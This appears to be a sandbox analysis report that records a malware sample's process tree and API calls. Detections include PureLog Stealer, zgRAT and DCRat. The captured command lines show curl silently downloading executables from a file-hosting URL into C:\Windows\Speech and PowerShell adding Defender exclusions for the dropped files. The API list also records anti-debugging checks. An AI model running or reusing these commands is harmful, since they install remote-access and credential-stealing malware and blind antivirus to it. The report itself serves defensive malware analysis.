Commandline:	C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Imagebase:	0x7ff7f6c90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:25:27
Start date:	30/09/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Imagebase:	0x7ff6c5840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:25:29
Start date:	30/09/2024
Path:	C:\Windows\Speech\kdmapper.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Speech\kdmapper.exe"
Imagebase:	0x150000
File size:	2'284'739 bytes
MD5 hash:	C85ABE0E8C3C4D4C5044AEF6422B8218
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.1492361002.00000000065B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.1491863067.00000000065B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
Antivirus matches:	Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:25:29
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Imagebase:	0x7ff7f6c90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:25:29
Start date:	30/09/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Imagebase:	0x7ff6c5840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:25:30
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
Imagebase:	0xe50000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:25:31
Start date:	30/09/2024
Path:	C:\Windows\Speech\physmeme.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Speech\physmeme.exe"
Imagebase:	0x460000
File size:	370'176 bytes
MD5 hash:	D6EDF37D68DA356237AE14270B3C7A1A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 61%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:25:31
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:25:32
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x820000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:25:45
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:25:45
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:25:45
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Edge/msedge.exe"
Imagebase:	0xc90000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000000.1650599430.0000000000C92000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.1706544888.00000000131A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:25:48
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline"
Imagebase:	0x7ff783050000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:25:48
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:25:48
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
Imagebase:	0x6c0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:25:48
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
Imagebase:	0xd40000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:25:48
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3594.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP"
Imagebase:	0x7ff6c9980000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:25:48
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline"
Imagebase:	0x7ff783050000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:25:48
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:25:49
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37B7.tmp" "c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP"
Imagebase:	0x7ff6c9980000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:25:49
Start date:	30/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe'
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:25:49
Start date:	30/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:25:49
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:25:49
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:25:50
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat"
Imagebase:	0x7ff7f6c90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:25:50
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:25:50
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7f1ec0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:25:50
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	C:\Edge\msedge.exe
Imagebase:	0x1c0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	12:25:50
Start date:	30/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7e4710000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:25:50
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	C:\Edge\msedge.exe
Imagebase:	0xf80000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	12:25:53
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	12:25:55
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Edge\msedge.exe"
Imagebase:	0xf0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	12:26:00
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
Imagebase:	0x4b0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	12:26:02
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat"
Imagebase:	0x7ff7f6c90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	12:26:02
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	12:26:02
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7f1ec0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	12:26:02
Start date:	30/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7e4710000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	12:26:07
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
Imagebase:	0x240000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	12:26:09
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Edge\msedge.exe"
Imagebase:	0xfd0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	12:26:12
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat" "
Imagebase:	0x7ff7f6c90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	12:26:12
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	12:26:12
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7f1ec0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	12:26:12
Start date:	30/09/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7f54f0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	12:26:17
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
Imagebase:	0x900000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	12:26:21
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat"
Imagebase:	0x7ff7f6c90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	12:26:21
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	12:26:21
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7f1ec0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	12:26:22
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Edge\msedge.exe"
Imagebase:	0xae0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	12:26:23
Start date:	30/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	true
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0xe00000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	51.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	6

Executed Functions

Function 00007FF68B4C3ED0 Relevance: 129.9, APIs: 58, Strings: 15, Instructions: 2127processwindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4B4760: GetModuleHandleA.KERNEL32 ref: 00007FF68B4B478C
Part of subcall function 00007FF68B4B4760: GetProcAddress.KERNEL32 ref: 00007FF68B4B479C
Part of subcall function 00007FF68B4B4760: VirtualProtect.KERNELBASE ref: 00007FF68B4B47B8
Part of subcall function 00007FF68B4B4760: VirtualProtect.KERNELBASE ref: 00007FF68B4B47D9
Part of subcall function 00007FF68B4B4760: LoadLibraryA.KERNEL32 ref: 00007FF68B4B47EB
Part of subcall function 00007FF68B4B4760: GetProcAddress.KERNEL32 ref: 00007FF68B4B47FB
Part of subcall function 00007FF68B4B4760: GetCurrentThread.KERNEL32 ref: 00007FF68B4B4809
Part of subcall function 00007FF68B4B4760: NtSetInformationThread.NTDLL ref: 00007FF68B4B481D
Part of subcall function 00007FF68B4B4760: QueryPerformanceFrequency.KERNEL32 ref: 00007FF68B4B4824
Part of subcall function 00007FF68B4B4760: QueryPerformanceCounter.KERNEL32 ref: 00007FF68B4B482F
Part of subcall function 00007FF68B4B4760: QueryPerformanceCounter.KERNEL32 ref: 00007FF68B4B485A

Part of subcall function 00007FF68B4B4220: ?_Random_device@std@@YAIXZ.MSVCP140 ref: 00007FF68B4B423F

Part of subcall function 00007FF68B4B4BD0: IsDebuggerPresent.KERNEL32 ref: 00007FF68B4B4BFF

Part of subcall function 00007FF68B4B4BD0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B4E7F
Part of subcall function 00007FF68B4B4BD0: exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B4E8A
Part of subcall function 00007FF68B4B4BD0: GetCurrentProcess.KERNEL32 ref: 00007FF68B4B4E97
Part of subcall function 00007FF68B4B4BD0: CheckRemoteDebuggerPresent.KERNELBASE ref: 00007FF68B4B4EA5

CreateThread.KERNELBASE ref: 00007FF68B4C3FF4
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4C4369
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4C4739
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4C4B09
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4C4B68
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C4B98
CreateFileW.KERNEL32 ref: 00007FF68B4C4BC5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4C4EF9
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C4FD0
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C5029
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C50F9
Sleep.KERNEL32 ref: 00007FF68B4C5117
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C51A3
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C51F9
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C53E0
CreateFileW.KERNEL32 ref: 00007FF68B4C540D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4C5759
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C5869
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4C5BF9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C5C3E
MessageBoxA.USER32 ref: 00007FF68B4C6013
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C6020
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF68B4C602D
Process32First.KERNEL32 ref: 00007FF68B4C604A
lstrcmpiA.KERNEL32 ref: 00007FF68B4C606E
Process32Next.KERNEL32 ref: 00007FF68B4C6086
